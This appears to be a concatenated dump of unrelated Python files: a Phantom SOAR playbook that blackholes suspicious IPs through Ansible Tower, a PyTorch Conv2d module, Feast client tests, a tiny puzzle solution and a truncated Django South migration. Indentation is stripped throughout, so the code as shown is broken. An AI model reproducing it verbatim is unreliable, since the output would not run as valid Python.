except ValueError:
priority = len(PRIORITIES)
return (priority, key)
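# Illustration of the ordering (keys below are illustrative): keys found in
# PRIORITIES sort by their position there, unknown keys come last, alphabetically.
# Example: sorted(["zone", "ip", "mtu", "name"], key=prioritize)
#          -> ["name", "zone", "mtu", "ip"]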
yaml.add_representer(dict, represent_dict)
sorted_data = priority_sorted([parse_validator(av.ArgValidator_DictConnection())])
yaml_example = (
yaml.dump(
sorted_data,
explicit_start=True,
default_flow_style=False,
width=100,
)
.replace(COMMENT, "#")
.replace(EMPTY, "")
)
# yaml_example = re.sub(r"# ([^:]*):", r": # \1", yaml_example)
print(yaml_example)
|
py | b414fec00105ce67465f95c11805a283ba75a1bc | import phantom.rules as phantom
import json
#
# Copyright (c) 2016 World Wide Technology, Inc.
# All rights reserved.
#
# author: Joel W. King, World Wide Technology
#
def on_start(container):
# call 'run_job_1' block
run_job_1(container)
return
def run_job_1(container, filtered_artifacts=None, filtered_results=None):
# collect data for 'run_job_1' call
container_data = phantom.collect2(container=container, datapath=['artifact:*.cef.sourceAddress', 'artifact:*.id'])
parameters = []
# build parameters list for 'run_job_1' call
for container_item in container_data:
parameters.append({
'dead interval': 300,
'extra vars': 'malicious_ip=%s' % container_item[0],
'job template id': "Remotely Triggered Black Hole",
# context (artifact id) is added for action results to be associated with the artifact
'context':{'artifact_id': container_item[1]},
})
print "parameters:%s" % parameters
if parameters:
phantom.act("run job", parameters=parameters, assets=['ansible_tower'], name="run_job_1")
return
def on_finish(container, summary):
# This function is called after all actions are completed.
# Summary and/or action results can be collected here.
# summary_json = phantom.get_summary()
# summary_results = summary_json['result']
# for result in summary_results:
# action_run_id = result['id']
# action_results = phantom.get_action_results(action_run_id=action_run_id)
return
|
py | b414fef2d580d163ff6d2380c90f94eb9e2bf948 | import typing
def main() -> typing.NoReturn:
a, b, c = map(int, input().split())
ans = 'YES' if 2 * b - a - c == 0 else 'NO'  # 2*b == a + c, i.e. a, b, c form an arithmetic progression
print(ans)
main()
|
py | b414ffd876c76775586825c03f2220000e46f0a5 | from functools import partial
from typing import Callable, Sequence
import numpy as np
import torch
from torch import Tensor
from torch import nn
import toys
from toys.parsers import parse_activation, parse_initializer
class Conv2d(nn.Module):
def __init__(self, in_channels, *channels, **kwargs):
'''Construct a 2D convolution layer.
Arguments:
in_channels (int):
The shape of feature channels in each inputs.
channels (int):
The number of activation maps in each layer.
Keyword Arguments:
kernel_size (int or Sequence[int]):
Size of the convolving kernel. Default: 3.
stride (float or int or Sequence[int]):
Stride of the convolution. Default: 1.
padding (int or Sequence[int]):
Zero-padding added to both sides of the input. Default: 0.
output_padding (int or Sequence[int]):
Additional size added to one side of each dimension in the
output shape, when using fractional stride. Default: 0.
dilation (int or Sequence[int]):
Spacing between kernel elements. Default: 1.
groups (int):
Number of blocked connections from input channels to output
channels. Default: 1.
bias (bool):
If set to False, the layer will not learn an additive bias.
Default: ``True``.
pooling (Callable or None):
A constructor for a pooling layer to apply after all
convolutions. Default: None.
**TODO**: Accept string values; requires extending `toys.parsers`.
activation ([Tensor] -> Tensor or str or None):
An activation function to apply after the convolution.
Default: :obj:`None`.
initializer ([Tensor] -> Tensor or str):
An initializer function for the weights.
Default: ``'kaiming_uniform'``.
bias_initializer ([Tensor] -> Tensor or str):
An initializer function for the bias.
Default: ``'constant:val=0'``.
'''
super().__init__()
kernel_size = kwargs.setdefault('kernel_size', 3)
stride = kwargs.setdefault('stride', 1)
padding = kwargs.setdefault('padding', 0)
output_padding = kwargs.setdefault('output_padding', 0)
dilation = kwargs.setdefault('dilation', 1)
groups = kwargs.setdefault('groups', 1)
bias = kwargs.setdefault('bias', True)
pooling = kwargs.setdefault('pooling', None)
actv = kwargs.setdefault('activation', None)
init = kwargs.setdefault('initializer', 'kaiming_uniform')
bias_init = kwargs.setdefault('bias_initializer', 'constant:val=0')
actv = parse_activation(actv)
init = parse_initializer(init)
bias_init = parse_initializer(bias_init)
assert 0 < len(channels)
assert 0 < stride
if 0 < stride < 1:
stride = int(1/stride)
Conv2d = partial(nn.ConvTranspose2d, output_padding=output_padding)
else:
assert output_padding == 0
Conv2d = nn.Conv2d
# TODO: create a parser for pooling arguments
if pooling is None:
pooling_layer = lambda x: x
else:
pooling_layer = pooling()
layers = []
prev = in_channels
for c in channels:
conv = Conv2d(prev, c,
kernel_size=kernel_size, stride=stride, padding=padding,
dilation=dilation, groups=groups, bias=bias)
conv.weight = init(conv.weight)
conv.bias = bias_init(conv.bias)
layers.append(conv)
prev = c
self.layers = nn.ModuleList(layers)
self.actv = actv
self.pooling = pooling_layer
def forward(self, x):
(*batch, height, width, channels) = x.shape
x = x.view(-1, height, width, channels)
x = torch.einsum('nhwc->nchw', [x])
for layer in self.layers:
x = layer(x)
x = self.actv(x)
x = torch.einsum('nchw->nhwc', [x])
x = x.view(*batch, height, width, -1)
x = self.pooling(x)
return x
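# Minimal standalone sketch of the channels-last handling used in forward() above;
# the tensor shapes and layer sizes are illustrative assumptions, plain PyTorch only.
if __name__ == '__main__':
    x = torch.randn(4, 32, 32, 3)               # (batch, height, width, channels)
    x_nchw = torch.einsum('nhwc->nchw', [x])    # to PyTorch's native layout
    y = nn.Conv2d(3, 8, kernel_size=3, padding=1)(x_nchw)
    y_nhwc = torch.einsum('nchw->nhwc', [y])    # back to channels-last
    print(y_nhwc.shape)                         # torch.Size([4, 32, 32, 8])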
|
py | b41500125cd0c162215b2cf015bae12b543daf7d | # Copyright 2019 The Feast Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pkgutil
import tempfile
from concurrent import futures
from datetime import datetime
from unittest import mock
import grpc
import pandas as pd
import pytest
from google.protobuf.duration_pb2 import Duration
from mock import MagicMock, patch
from pandavro import to_avro
from pytz import timezone
import dataframes
import feast.core.CoreService_pb2_grpc as Core
import feast.serving.ServingService_pb2_grpc as Serving
from feast.client import Client
from feast.core.CoreService_pb2 import (
GetFeastCoreVersionResponse,
GetFeatureSetResponse,
)
from feast.core.FeatureSet_pb2 import EntitySpec as EntitySpecProto
from feast.core.FeatureSet_pb2 import FeatureSet as FeatureSetProto
from feast.core.FeatureSet_pb2 import FeatureSetMeta as FeatureSetMetaProto
from feast.core.FeatureSet_pb2 import FeatureSetSpec as FeatureSetSpecProto
from feast.core.FeatureSet_pb2 import FeatureSetStatus as FeatureSetStatusProto
from feast.core.FeatureSet_pb2 import FeatureSpec as FeatureSpecProto
from feast.core.Source_pb2 import KafkaSourceConfig, Source, SourceType
from feast.entity import Entity
from feast.feature_set import Feature, FeatureSet
from feast.job import Job
from feast.serving.ServingService_pb2 import (
DataFormat,
FeastServingType,
GetBatchFeaturesResponse,
GetFeastServingInfoResponse,
GetJobResponse,
GetOnlineFeaturesRequest,
GetOnlineFeaturesResponse,
)
from feast.serving.ServingService_pb2 import Job as BatchFeaturesJob
from feast.serving.ServingService_pb2 import JobStatus, JobType
from feast.source import KafkaSource
from feast.types import Value_pb2 as ValueProto
from feast.value_type import ValueType
from feast_core_server import CoreServicer
from feast_serving_server import ServingServicer
CORE_URL = "core.feast.example.com"
SERVING_URL = "serving.example.com"
_PRIVATE_KEY_RESOURCE_PATH = "data/localhost.key"
_CERTIFICATE_CHAIN_RESOURCE_PATH = "data/localhost.pem"
_ROOT_CERTIFICATE_RESOURCE_PATH = "data/localhost.crt"
class TestClient:
@pytest.fixture
def secure_mock_client(self, mocker):
client = Client(
core_url=CORE_URL,
serving_url=SERVING_URL,
core_secure=True,
serving_secure=True,
)
mocker.patch.object(client, "_connect_core")
mocker.patch.object(client, "_connect_serving")
client._core_url = CORE_URL
client._serving_url = SERVING_URL
return client
@pytest.fixture
def mock_client(self, mocker):
client = Client(core_url=CORE_URL, serving_url=SERVING_URL)
mocker.patch.object(client, "_connect_core")
mocker.patch.object(client, "_connect_serving")
client._core_url = CORE_URL
client._serving_url = SERVING_URL
return client
@pytest.fixture
def server_credentials(self):
private_key = pkgutil.get_data(__name__, _PRIVATE_KEY_RESOURCE_PATH)
certificate_chain = pkgutil.get_data(__name__, _CERTIFICATE_CHAIN_RESOURCE_PATH)
return grpc.ssl_server_credentials(((private_key, certificate_chain),))
@pytest.fixture
def core_server(self):
server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
Core.add_CoreServiceServicer_to_server(CoreServicer(), server)
server.add_insecure_port("[::]:50051")
server.start()
yield server
server.stop(0)
@pytest.fixture
def serving_server(self):
server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
Serving.add_ServingServiceServicer_to_server(ServingServicer(), server)
server.add_insecure_port("[::]:50052")
server.start()
yield server
server.stop(0)
@pytest.fixture
def secure_core_server(self, server_credentials):
server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
Core.add_CoreServiceServicer_to_server(CoreServicer(), server)
server.add_secure_port("[::]:50053", server_credentials)
server.start()
yield server
server.stop(0)
@pytest.fixture
def secure_serving_server(self, server_credentials):
server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
Serving.add_ServingServiceServicer_to_server(ServingServicer(), server)
server.add_secure_port("[::]:50054", server_credentials)
server.start()
yield server
server.stop(0)
@pytest.fixture
def secure_client(self, secure_core_server, secure_serving_server):
root_certificate_credentials = pkgutil.get_data(
__name__, _ROOT_CERTIFICATE_RESOURCE_PATH
)
# this is needed to establish a secure connection using self-signed certificates, for the purpose of the test
ssl_channel_credentials = grpc.ssl_channel_credentials(
root_certificates=root_certificate_credentials
)
with mock.patch(
"grpc.ssl_channel_credentials",
MagicMock(return_value=ssl_channel_credentials),
):
yield Client(
core_url="localhost:50053",
serving_url="localhost:50054",
core_secure=True,
serving_secure=True,
)
@pytest.fixture
def client(self, core_server, serving_server):
return Client(core_url="localhost:50051", serving_url="localhost:50052")
@pytest.mark.parametrize(
"mocked_client",
[pytest.lazy_fixture("mock_client"), pytest.lazy_fixture("secure_mock_client")],
)
def test_version(self, mocked_client, mocker):
mocked_client._core_service_stub = Core.CoreServiceStub(
grpc.insecure_channel("")
)
mocked_client._serving_service_stub = Serving.ServingServiceStub(
grpc.insecure_channel("")
)
mocker.patch.object(
mocked_client._core_service_stub,
"GetFeastCoreVersion",
return_value=GetFeastCoreVersionResponse(version="0.3.2"),
)
mocker.patch.object(
mocked_client._serving_service_stub,
"GetFeastServingInfo",
return_value=GetFeastServingInfoResponse(version="0.3.2"),
)
status = mocked_client.version()
assert (
status["core"]["url"] == CORE_URL
and status["core"]["version"] == "0.3.2"
and status["serving"]["url"] == SERVING_URL
and status["serving"]["version"] == "0.3.2"
)
@pytest.mark.parametrize(
"mocked_client",
[pytest.lazy_fixture("mock_client"), pytest.lazy_fixture("secure_mock_client")],
)
def test_get_online_features(self, mocked_client, mocker):
ROW_COUNT = 300
mocked_client._serving_service_stub = Serving.ServingServiceStub(
grpc.insecure_channel("")
)
fields = dict()
for feature_num in range(1, 10):
fields[f"my_project/feature_{str(feature_num)}:1"] = ValueProto.Value(
int64_val=feature_num
)
field_values = GetOnlineFeaturesResponse.FieldValues(fields=fields)
response = GetOnlineFeaturesResponse()
entity_rows = []
for row_number in range(1, ROW_COUNT + 1):
response.field_values.append(field_values)
entity_rows.append(
GetOnlineFeaturesRequest.EntityRow(
fields={"customer_id": ValueProto.Value(int64_val=row_number)}
)
)
mocker.patch.object(
mocked_client._serving_service_stub,
"GetOnlineFeatures",
return_value=response,
)
response = mocked_client.get_online_features(
entity_rows=entity_rows,
feature_refs=[
"my_project/feature_1:1",
"my_project/feature_2:1",
"my_project/feature_3:1",
"my_project/feature_4:1",
"my_project/feature_5:1",
"my_project/feature_6:1",
"my_project/feature_7:1",
"my_project/feature_8:1",
"my_project/feature_9:1",
],
) # type: GetOnlineFeaturesResponse
assert (
response.field_values[0].fields["my_project/feature_1:1"].int64_val == 1
and response.field_values[0].fields["my_project/feature_9:1"].int64_val == 9
)
@pytest.mark.parametrize(
"mocked_client",
[pytest.lazy_fixture("mock_client"), pytest.lazy_fixture("secure_mock_client")],
)
def test_get_feature_set(self, mocked_client, mocker):
mocked_client._core_service_stub = Core.CoreServiceStub(
grpc.insecure_channel("")
)
from google.protobuf.duration_pb2 import Duration
mocker.patch.object(
mocked_client._core_service_stub,
"GetFeatureSet",
return_value=GetFeatureSetResponse(
feature_set=FeatureSetProto(
spec=FeatureSetSpecProto(
name="my_feature_set",
version=2,
max_age=Duration(seconds=3600),
features=[
FeatureSpecProto(
name="my_feature_1",
value_type=ValueProto.ValueType.FLOAT,
),
FeatureSpecProto(
name="my_feature_2",
value_type=ValueProto.ValueType.FLOAT,
),
],
entities=[
EntitySpecProto(
name="my_entity_1",
value_type=ValueProto.ValueType.INT64,
)
],
source=Source(
type=SourceType.KAFKA,
kafka_source_config=KafkaSourceConfig(
bootstrap_servers="localhost:9092", topic="topic"
),
),
),
meta=FeatureSetMetaProto(),
)
),
)
mocked_client.set_project("my_project")
feature_set = mocked_client.get_feature_set("my_feature_set", version=2)
assert (
feature_set.name == "my_feature_set"
and feature_set.version == 2
and feature_set.fields["my_feature_1"].name == "my_feature_1"
and feature_set.fields["my_feature_1"].dtype == ValueType.FLOAT
and feature_set.fields["my_entity_1"].name == "my_entity_1"
and feature_set.fields["my_entity_1"].dtype == ValueType.INT64
and len(feature_set.features) == 2
and len(feature_set.entities) == 1
)
@pytest.mark.parametrize(
"mocked_client",
[pytest.lazy_fixture("mock_client"), pytest.lazy_fixture("secure_mock_client")],
)
def test_get_batch_features(self, mocked_client, mocker):
mocked_client._serving_service_stub = Serving.ServingServiceStub(
grpc.insecure_channel("")
)
mocked_client._core_service_stub = Core.CoreServiceStub(
grpc.insecure_channel("")
)
mocker.patch.object(
mocked_client._core_service_stub,
"GetFeatureSet",
return_value=GetFeatureSetResponse(
feature_set=FeatureSetProto(
spec=FeatureSetSpecProto(
name="customer_fs",
version=1,
project="my_project",
entities=[
EntitySpecProto(
name="customer", value_type=ValueProto.ValueType.INT64
),
EntitySpecProto(
name="transaction",
value_type=ValueProto.ValueType.INT64,
),
],
features=[
FeatureSpecProto(
name="customer_feature_1",
value_type=ValueProto.ValueType.FLOAT,
),
FeatureSpecProto(
name="customer_feature_2",
value_type=ValueProto.ValueType.STRING,
),
],
),
meta=FeatureSetMetaProto(status=FeatureSetStatusProto.STATUS_READY),
)
),
)
expected_dataframe = pd.DataFrame(
{
"datetime": [datetime.utcnow() for _ in range(3)],
"customer": [1001, 1002, 1003],
"transaction": [1001, 1002, 1003],
"my_project/customer_feature_1:1": [1001, 1002, 1003],
"my_project/customer_feature_2:1": [1001, 1002, 1003],
}
)
final_results = tempfile.mktemp()
to_avro(file_path_or_buffer=final_results, df=expected_dataframe)
mocker.patch.object(
mocked_client._serving_service_stub,
"GetBatchFeatures",
return_value=GetBatchFeaturesResponse(
job=BatchFeaturesJob(
id="123",
type=JobType.JOB_TYPE_DOWNLOAD,
status=JobStatus.JOB_STATUS_DONE,
file_uris=[f"file://{final_results}"],
data_format=DataFormat.DATA_FORMAT_AVRO,
)
),
)
mocker.patch.object(
mocked_client._serving_service_stub,
"GetJob",
return_value=GetJobResponse(
job=BatchFeaturesJob(
id="123",
type=JobType.JOB_TYPE_DOWNLOAD,
status=JobStatus.JOB_STATUS_DONE,
file_uris=[f"file://{final_results}"],
data_format=DataFormat.DATA_FORMAT_AVRO,
)
),
)
mocker.patch.object(
mocked_client._serving_service_stub,
"GetFeastServingInfo",
return_value=GetFeastServingInfoResponse(
job_staging_location=f"file://{tempfile.mkdtemp()}/",
type=FeastServingType.FEAST_SERVING_TYPE_BATCH,
),
)
mocked_client.set_project("project1")
response = mocked_client.get_batch_features(
entity_rows=pd.DataFrame(
{
"datetime": [
pd.datetime.now(tz=timezone("Asia/Singapore")) for _ in range(3)
],
"customer": [1001, 1002, 1003],
"transaction": [1001, 1002, 1003],
}
),
feature_refs=[
"my_project/customer_feature_1:1",
"my_project/customer_feature_2:1",
],
) # type: Job
assert response.id == "123" and response.status == JobStatus.JOB_STATUS_DONE
actual_dataframe = response.to_dataframe()
assert actual_dataframe[
["my_project/customer_feature_1:1", "my_project/customer_feature_2:1"]
].equals(
expected_dataframe[
["my_project/customer_feature_1:1", "my_project/customer_feature_2:1"]
]
)
@pytest.mark.parametrize(
"test_client",
[pytest.lazy_fixture("client"), pytest.lazy_fixture("secure_client")],
)
def test_apply_feature_set_success(self, test_client):
test_client.set_project("project1")
# Create Feature Sets
fs1 = FeatureSet("my-feature-set-1")
fs1.add(Feature(name="fs1-my-feature-1", dtype=ValueType.INT64))
fs1.add(Feature(name="fs1-my-feature-2", dtype=ValueType.STRING))
fs1.add(Entity(name="fs1-my-entity-1", dtype=ValueType.INT64))
fs2 = FeatureSet("my-feature-set-2")
fs2.add(Feature(name="fs2-my-feature-1", dtype=ValueType.STRING_LIST))
fs2.add(Feature(name="fs2-my-feature-2", dtype=ValueType.BYTES_LIST))
fs2.add(Entity(name="fs2-my-entity-1", dtype=ValueType.INT64))
# Register Feature Set with Core
test_client.apply(fs1)
test_client.apply(fs2)
feature_sets = test_client.list_feature_sets()
# List Feature Sets
assert (
len(feature_sets) == 2
and feature_sets[0].name == "my-feature-set-1"
and feature_sets[0].features[0].name == "fs1-my-feature-1"
and feature_sets[0].features[0].dtype == ValueType.INT64
and feature_sets[1].features[1].dtype == ValueType.BYTES_LIST
)
@pytest.mark.parametrize(
"dataframe,test_client",
[
(dataframes.GOOD, pytest.lazy_fixture("client")),
(dataframes.GOOD, pytest.lazy_fixture("secure_client")),
],
)
def test_feature_set_ingest_success(self, dataframe, test_client, mocker):
test_client.set_project("project1")
driver_fs = FeatureSet(
"driver-feature-set", source=KafkaSource(brokers="kafka:9092", topic="test")
)
driver_fs.add(Feature(name="feature_1", dtype=ValueType.FLOAT))
driver_fs.add(Feature(name="feature_2", dtype=ValueType.STRING))
driver_fs.add(Feature(name="feature_3", dtype=ValueType.INT64))
driver_fs.add(Entity(name="entity_id", dtype=ValueType.INT64))
# Register with Feast core
test_client.apply(driver_fs)
driver_fs = driver_fs.to_proto()
driver_fs.meta.status = FeatureSetStatusProto.STATUS_READY
mocker.patch.object(
test_client._core_service_stub,
"GetFeatureSet",
return_value=GetFeatureSetResponse(feature_set=driver_fs),
)
# Need to create a mock producer
with patch("feast.client.get_producer"):
# Ingest data into Feast
test_client.ingest("driver-feature-set", dataframe)
@pytest.mark.parametrize(
"dataframe,exception,test_client",
[
(dataframes.GOOD, TimeoutError, pytest.lazy_fixture("client")),
(dataframes.GOOD, TimeoutError, pytest.lazy_fixture("secure_client")),
],
)
def test_feature_set_ingest_fail_if_pending(
self, dataframe, exception, test_client, mocker
):
with pytest.raises(exception):
test_client.set_project("project1")
driver_fs = FeatureSet(
"driver-feature-set",
source=KafkaSource(brokers="kafka:9092", topic="test"),
)
driver_fs.add(Feature(name="feature_1", dtype=ValueType.FLOAT))
driver_fs.add(Feature(name="feature_2", dtype=ValueType.STRING))
driver_fs.add(Feature(name="feature_3", dtype=ValueType.INT64))
driver_fs.add(Entity(name="entity_id", dtype=ValueType.INT64))
# Register with Feast core
test_client.apply(driver_fs)
driver_fs = driver_fs.to_proto()
driver_fs.meta.status = FeatureSetStatusProto.STATUS_PENDING
mocker.patch.object(
test_client._core_service_stub,
"GetFeatureSet",
return_value=GetFeatureSetResponse(feature_set=driver_fs),
)
# Need to create a mock producer
with patch("feast.client.get_producer"):
# Ingest data into Feast
test_client.ingest("driver-feature-set", dataframe, timeout=1)
@pytest.mark.parametrize(
"dataframe,exception,test_client",
[
(dataframes.BAD_NO_DATETIME, Exception, pytest.lazy_fixture("client")),
(
dataframes.BAD_INCORRECT_DATETIME_TYPE,
Exception,
pytest.lazy_fixture("client"),
),
(dataframes.BAD_NO_ENTITY, Exception, pytest.lazy_fixture("client")),
(dataframes.NO_FEATURES, Exception, pytest.lazy_fixture("client")),
(
dataframes.BAD_NO_DATETIME,
Exception,
pytest.lazy_fixture("secure_client"),
),
(
dataframes.BAD_INCORRECT_DATETIME_TYPE,
Exception,
pytest.lazy_fixture("secure_client"),
),
(dataframes.BAD_NO_ENTITY, Exception, pytest.lazy_fixture("secure_client")),
(dataframes.NO_FEATURES, Exception, pytest.lazy_fixture("secure_client")),
],
)
def test_feature_set_ingest_failure(self, test_client, dataframe, exception):
with pytest.raises(exception):
# Create feature set
driver_fs = FeatureSet("driver-feature-set")
# Update based on dataset
driver_fs.infer_fields_from_df(dataframe)
# Register with Feast core
test_client.apply(driver_fs)
# Ingest data into Feast
test_client.ingest(driver_fs, dataframe=dataframe)
@pytest.mark.parametrize(
"dataframe,test_client",
[
(dataframes.ALL_TYPES, pytest.lazy_fixture("client")),
(dataframes.ALL_TYPES, pytest.lazy_fixture("secure_client")),
],
)
def test_feature_set_types_success(self, test_client, dataframe, mocker):
test_client.set_project("project1")
all_types_fs = FeatureSet(
name="all_types",
entities=[Entity(name="user_id", dtype=ValueType.INT64)],
features=[
Feature(name="float_feature", dtype=ValueType.FLOAT),
Feature(name="int64_feature", dtype=ValueType.INT64),
Feature(name="int32_feature", dtype=ValueType.INT32),
Feature(name="string_feature", dtype=ValueType.STRING),
Feature(name="bytes_feature", dtype=ValueType.BYTES),
Feature(name="bool_feature", dtype=ValueType.BOOL),
Feature(name="double_feature", dtype=ValueType.DOUBLE),
Feature(name="float_list_feature", dtype=ValueType.FLOAT_LIST),
Feature(name="int64_list_feature", dtype=ValueType.INT64_LIST),
Feature(name="int32_list_feature", dtype=ValueType.INT32_LIST),
Feature(name="string_list_feature", dtype=ValueType.STRING_LIST),
Feature(name="bytes_list_feature", dtype=ValueType.BYTES_LIST),
# Feature(name="bool_list_feature",
# dtype=ValueType.BOOL_LIST), # TODO: Add support for this
# type again https://github.com/gojek/feast/issues/341
Feature(name="double_list_feature", dtype=ValueType.DOUBLE_LIST),
],
max_age=Duration(seconds=3600),
)
# Register with Feast core
test_client.apply(all_types_fs)
mocker.patch.object(
test_client._core_service_stub,
"GetFeatureSet",
return_value=GetFeatureSetResponse(feature_set=all_types_fs.to_proto()),
)
# Need to create a mock producer
with patch("feast.client.get_producer"):
# Ingest data into Feast
test_client.ingest(all_types_fs, dataframe)
@patch("grpc.channel_ready_future")
def test_secure_channel_creation_with_secure_client(self, _mocked_obj):
client = Client(
core_url="localhost:50051",
serving_url="localhost:50052",
serving_secure=True,
core_secure=True,
)
with mock.patch("grpc.secure_channel") as _grpc_mock, mock.patch(
"grpc.ssl_channel_credentials", MagicMock(return_value="test")
) as _mocked_credentials:
client._connect_serving()
_grpc_mock.assert_called_with(
client.serving_url, _mocked_credentials.return_value
)
@mock.patch("grpc.channel_ready_future")
def test_secure_channel_creation_with_secure_serving_url(
self, _mocked_obj,
):
client = Client(core_url="localhost:50051", serving_url="localhost:443")
with mock.patch("grpc.secure_channel") as _grpc_mock, mock.patch(
"grpc.ssl_channel_credentials", MagicMock(return_value="test")
) as _mocked_credentials:
client._connect_serving()
_grpc_mock.assert_called_with(
client.serving_url, _mocked_credentials.return_value
)
@patch("grpc.channel_ready_future")
def test_secure_channel_creation_with_secure_core_url(self, _mocked_obj):
client = Client(core_url="localhost:443", serving_url="localhost:50054")
with mock.patch("grpc.secure_channel") as _grpc_mock, mock.patch(
"grpc.ssl_channel_credentials", MagicMock(return_value="test")
) as _mocked_credentials:
client._connect_core()
_grpc_mock.assert_called_with(
client.core_url, _mocked_credentials.return_value
)
|
py | b415011c308bfbe645607a59b024e080d17fed36 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Pages'
db.create_table(u'survey_pages', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('pageNum', self.gf('django.db.models.fields.CharField')(max_length=256, null=True, blank=True)),
('associatedS', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['core.Source'], null=True, blank=True)),
))
db.send_create_signal(u'survey', ['Pages'])
# Adding M2M table for field new on 'Response'
m2m_table_name = db.shorten_name('responses_new')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('response', models.ForeignKey(orm[u'survey.response'], null=False)),
('pages', models.ForeignKey(orm[u'survey.pages'], null=False))
))
db.create_unique(m2m_table_name, ['response_id', 'pages_id'])
def backwards(self, orm):
# Deleting model 'Pages'
db.delete_table(u'survey_pages')
# Removing M2M table for field new on 'Response'
db.delete_table(db.shorten_name('responses_new'))
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'core.culture': {
'Meta': {'ordering': "['culture']", 'object_name': 'Culture', 'db_table': "'cultures'"},
'added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'coder': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'culture': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128', 'db_index': 'True'}),
'editor': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'fact': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'languages': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['core.Language']", 'symmetrical': 'False', 'blank': 'True'}),
'notes': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '128'})
},
u'core.language': {
'Meta': {'ordering': "['language']", 'unique_together': "(('isocode', 'language'),)", 'object_name': 'Language', 'db_table': "'languages'"},
'abvdcode': ('django.db.models.fields.IntegerField', [], {'db_index': 'True', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'classification': ('django.db.models.fields.TextField', [], {}),
'editor': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'isocode': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '3', 'db_index': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'})
},
u'core.section': {
'Meta': {'ordering': "['id']", 'object_name': 'Section', 'db_table': "'sections'"},
'added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'editor': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'notes': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'section': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '128'})
},
u'core.source': {
'Meta': {'ordering': "['author', 'year']", 'unique_together': "(['author', 'year'],)", 'object_name': 'Source', 'db_table': "'sources'", 'index_together': "[['author', 'year']]"},
